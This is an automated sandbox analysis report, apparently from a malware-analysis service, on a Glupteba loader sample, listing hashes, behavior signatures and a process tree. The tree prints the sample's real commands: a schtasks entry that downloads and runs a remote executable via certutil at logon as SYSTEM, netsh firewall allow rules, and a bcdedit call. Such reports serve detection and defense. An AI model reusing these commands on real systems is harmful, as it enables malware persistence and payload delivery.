glupteba | 0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9

Analysis

max time kernel
8s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
24-05-2022 22:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
Size

3.8MB
MD5

e51a0b613b59b37bab967296c51d92fd
SHA1

6225edc53dacfa8ecafb0285d226c1e926cac42b
SHA256

0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9
SHA512

442a861c4080d09da452353f38886b7a0cc09e09a959f9aa722273827d33fedbdbf27c93d799ad8ecdbe4c6d7a8bc9b9f561ae9c27d7f193ec8bda27cbca470e

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2084-146-0x0000000000400000-0x00000000036BC000-memory.dmp	family_glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4148 created 1424 4148 svchost.exe WerFault.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

4952 bcdedit.exe

description	pid	process	target process
PID 4148 created 1424	4148	svchost.exe	WerFault.exe

pid	process
4952	bcdedit.exe

Program crash 63 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3924	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4196	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4172	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4232	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4252	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4248	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4660	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4872	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
2228	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
1920	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
388	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
2364	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
3752	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4480	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
5012	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
3272	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4496	1424	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
1192	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
3316	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
1808	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
1280	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4916	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4276	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
2344	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4000	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4140	4328	WerFault.exe	0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
4088	2084	WerFault.exe	csrss.exe
1884	2084	WerFault.exe	csrss.exe
2940	2084	WerFault.exe	csrss.exe
2656	2084	WerFault.exe	csrss.exe
2764	2084	WerFault.exe	csrss.exe
3120	2084	WerFault.exe	csrss.exe
2504	2084	WerFault.exe	csrss.exe
4452	2084	WerFault.exe	csrss.exe
3044	2084	WerFault.exe	csrss.exe
3812	2084	WerFault.exe	csrss.exe
4448	2084	WerFault.exe	csrss.exe
4360	2084	WerFault.exe	csrss.exe
2408	2084	WerFault.exe	csrss.exe
4192	2084	WerFault.exe	csrss.exe
4200	2084	WerFault.exe	csrss.exe
4948	2084	WerFault.exe	csrss.exe
4648	2084	WerFault.exe	csrss.exe
4240	2084	WerFault.exe	csrss.exe
2532	2084	WerFault.exe	csrss.exe
4304	2084	WerFault.exe	csrss.exe
3816	2084	WerFault.exe	csrss.exe
3656	2084	WerFault.exe	csrss.exe
4408	2084	WerFault.exe	csrss.exe
2376	2084	WerFault.exe	csrss.exe
2088	2084	WerFault.exe	csrss.exe
4480	2084	WerFault.exe	csrss.exe
5012	2084	WerFault.exe	csrss.exe
804	2084	WerFault.exe	csrss.exe
4496	2084	WerFault.exe	csrss.exe
1928	2084	WerFault.exe	csrss.exe
204	2084	WerFault.exe	csrss.exe
2240	2084	WerFault.exe	csrss.exe
1536	2084	WerFault.exe	csrss.exe
368	2084	WerFault.exe	csrss.exe
856	2084	WerFault.exe	csrss.exe
4664	2084	WerFault.exe	csrss.exe
1404	2084	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3196 schtasks.exe
3028 schtasks.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

WerFault.exe

pid process

1424 WerFault.exe
1424 WerFault.exe

pid	process
3196	schtasks.exe
3028	schtasks.exe

pid	process
1424	WerFault.exe
1424	WerFault.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

WerFault.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1424	WerFault.exe
Token: SeImpersonatePrivilege	1424	WerFault.exe
Token: SeTcbPrivilege	4148	svchost.exe
Token: SeTcbPrivilege	4148	svchost.exe

C:\Users\Admin\AppData\Local\Temp\0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
"C:\Users\Admin\AppData\Local\Temp\0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe"
1⤵
PID:1424
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 260
  2⤵
  - Program crash
  PID:3924
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 392
  2⤵
  - Program crash
  PID:4196
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 376
  2⤵
  - Program crash
  PID:4172
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 600
  2⤵
  - Program crash
  PID:4232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 600
  2⤵
  - Program crash
  PID:4252
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 724
  2⤵
  - Program crash
  PID:4248
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 716
  2⤵
  - Program crash
  PID:4660
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 712
  2⤵
  - Program crash
  PID:4872
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 752
  2⤵
  - Program crash
  PID:2228
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 692
  2⤵
  - Program crash
  PID:1920
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 780
  2⤵
  - Program crash
  PID:388
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 700
  2⤵
  - Program crash
  PID:2364
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 788
  2⤵
  - Program crash
  PID:3752
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 856
  2⤵
  - Program crash
  PID:4480
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 776
  2⤵
  - Program crash
  PID:5012
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 772
  2⤵
  - Program crash
  PID:3272
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 652
  2⤵
  - Program crash
  PID:4496
- C:\Users\Admin\AppData\Local\Temp\0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe
  "C:\Users\Admin\AppData\Local\Temp\0de3e3d7460d38e6fe4b9d53795202f6a404de0a932351e8b4ea1b4460898dd9.exe"
  2⤵
  PID:4328
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 336
    3⤵
    - Program crash
    PID:1192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 636
    3⤵
    - Program crash
    PID:3316
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 636
    3⤵
    - Program crash
    PID:1808
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 636
    3⤵
    - Program crash
    PID:1280
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 700
    3⤵
    - Program crash
    PID:4916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 708
    3⤵
    - Program crash
    PID:4276
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 740
    3⤵
    - Program crash
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 336
    3⤵
    - Program crash
    PID:4000
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 332
    3⤵
    - Program crash
    PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
    3⤵
    PID:5092
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    PID:2084
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 368
      4⤵
      Program crash
      PID:4088
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 372
      4⤵
      Program crash
      PID:1884
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 372
      4⤵
      Program crash
      PID:2940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 552
      4⤵
      Program crash
      PID:2656
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 552
      4⤵
      Program crash
      PID:2764
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 596
      4⤵
      Program crash
      PID:3120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 692
      4⤵
      Program crash
      PID:2504
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:3196
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:3028
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 844
      4⤵
      Program crash
      PID:4452
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 908
      4⤵
      Program crash
      PID:3044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 920
      4⤵
      Program crash
      PID:3812
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 920
      4⤵
      Program crash
      PID:4448
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 916
      4⤵
      Program crash
      PID:4360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 956
      4⤵
      Program crash
      PID:2408
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1036
      4⤵
      Program crash
      PID:4192
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1012
      4⤵
      Program crash
      PID:4200
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      PID:4956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 940
      4⤵
      Program crash
      PID:4948
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1012
      4⤵
      Program crash
      PID:4648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 936
      4⤵
      Program crash
      PID:4240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 964
      4⤵
      Program crash
      PID:2532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 804
      4⤵
      Program crash
      PID:4304
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1140
      4⤵
      Program crash
      PID:3816
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1112
      4⤵
      Program crash
      PID:3656
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 968
      4⤵
      Program crash
      PID:4408
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1604
      4⤵
      Program crash
      PID:2376
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1864
      4⤵
      Program crash
      PID:2088
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1880
      4⤵
      Program crash
      PID:4480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1888
      4⤵
      Program crash
      PID:5012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1628
      4⤵
      Program crash
      PID:804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1676
      4⤵
      Program crash
      PID:4496
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1744
      4⤵
      Program crash
      PID:1928
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1680
      4⤵
      Program crash
      PID:204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1868
      4⤵
      Program crash
      PID:2240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1692
      4⤵
      Program crash
      PID:1536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1900
      4⤵
      Program crash
      PID:368
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1636
      4⤵
      Program crash
      PID:856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1736
      4⤵
      Program crash
      PID:4664
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1684
      4⤵
      Program crash
      PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1424 -ip 1424
1⤵
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1424 -ip 1424
1⤵
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1424 -ip 1424
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1424 -ip 1424
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1424 -ip 1424
1⤵
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1424 -ip 1424
1⤵
PID:2172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1424 -ip 1424
1⤵
PID:2532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1424 -ip 1424
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1424 -ip 1424
1⤵
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1424 -ip 1424
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1424 -ip 1424
1⤵
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1424 -ip 1424
1⤵
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1424 -ip 1424
1⤵
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1424 -ip 1424
1⤵
PID:1880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1424 -ip 1424
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1424 -ip 1424
1⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1424 -ip 1424
1⤵
PID:4516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4328 -ip 4328
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4328 -ip 4328
1⤵
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4328 -ip 4328
1⤵
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4328 -ip 4328
1⤵
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4328 -ip 4328
1⤵
PID:360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4328 -ip 4328
1⤵
PID:2484

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
PID:2592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4328 -ip 4328
1⤵
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4328 -ip 4328
1⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4328 -ip 4328
1⤵
PID:3772

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
1⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2084 -ip 2084
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2084 -ip 2084
1⤵
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2084 -ip 2084
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2084 -ip 2084
1⤵
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2084 -ip 2084
1⤵
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2084 -ip 2084
1⤵
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2084 -ip 2084
1⤵
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2084 -ip 2084
1⤵
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2084 -ip 2084
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2084 -ip 2084
1⤵
PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2084 -ip 2084
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2084 -ip 2084
1⤵
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2084 -ip 2084
1⤵
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2084 -ip 2084
1⤵
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2084 -ip 2084
1⤵
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2084 -ip 2084
1⤵
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2084 -ip 2084
1⤵
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2084 -ip 2084
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2084 -ip 2084
1⤵
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2084 -ip 2084
1⤵
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2084 -ip 2084
1⤵
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2084 -ip 2084
1⤵
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2084 -ip 2084
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2084 -ip 2084
1⤵
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2084 -ip 2084
1⤵
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2084 -ip 2084
1⤵
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2084 -ip 2084
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2084 -ip 2084
1⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2084 -ip 2084
1⤵
PID:2872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2084 -ip 2084
1⤵
PID:1848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2084 -ip 2084
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2084 -ip 2084
1⤵
PID:2780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2084 -ip 2084
1⤵
PID:1680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2084 -ip 2084
1⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2084 -ip 2084
1⤵
